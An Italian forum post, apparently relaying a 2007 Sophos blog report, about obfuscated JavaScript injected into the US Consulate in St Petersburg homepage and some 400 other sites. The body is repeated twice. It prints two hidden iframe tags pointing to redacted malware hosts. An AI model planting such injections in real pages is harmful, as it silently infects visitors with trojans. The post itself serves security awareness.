xcdegasp
14-09-2007, 13:53
Alcuni giorni fa SophosLabs ha individuato un javascript offuscato (Mal/ObfJS-C) nella homepage del Consolato degli Stati Uniti in Russia.
Analizzando il codice sorgente si può notare los cript offuscato e criptato:
http://img213.imageshack.us/img213/4494/cons1bg7.th.gif (http://img213.imageshack.us/my.php?image=cons1bg7.gif)
lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima:
<iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe>
Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione:
http://www.sophos.com/images/sophoslabs-blog/2007/09/cons2_sm.gif (http://www.sophos.com/images/sophoslabs-blog/2007/09/cons2.gif)
1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg.
2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo.
3. Ogni vettore fa installare un trojan.
La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo:
<iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe>
L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico".
Fonte: sophos.com (http://www.sophos.com/security/blog/2007/09/580.html)
Analizzando il codice sorgente si può notare los cript offuscato e criptato:
http://img213.imageshack.us/img213/4494/cons1bg7.th.gif (http://img213.imageshack.us/my.php?image=cons1bg7.gif)
lo script tenta di scrivere nella pagina un iframe che prova a far scaricare silenziosamente ulteriore codice maligno nel pc della vittima:
<iframe name='6326fcf2ca' src='http://[removed].com/xxxx/index.php' width=10 height=12 style='display:none'></iframe>
Ad interrogare gli archivi della settimana scorsa sono emerse ben 400 pagine con la stessa infezione:
http://www.sophos.com/images/sophoslabs-blog/2007/09/cons2_sm.gif (http://www.sophos.com/images/sophoslabs-blog/2007/09/cons2.gif)
1. Sulla sinistra sono rappresentati un grande gruppo di nodi e ciasc'uno rappresenta un sito web compromesso. Il nodo evidenziato in giallo è quello del Consolato americano in st Petersburg.
2. I nodi confluiscono presso due nodi che fanno da vettore per scaricare il materiale infettivo.
3. Ogni vettore fa installare un trojan.
La pagina del Consolato Americano fa connettere ad entrambi i nodi infettivi facendo sì che si scarichino entrambi i trojan e ch nella pagina risulti un ulteriore iframe malevolo:
<iframe src='http://[removed].info/info/' width='1' height='1' style='visibility: hidden;'></iframe>
L'attacco non era rivolto verso il Consolato in se ma ha seguito sempre lasolita tecnica con la quale questa banda opera che è simile al "pescare a strascico".
Fonte: sophos.com (http://www.sophos.com/security/blog/2007/09/580.html)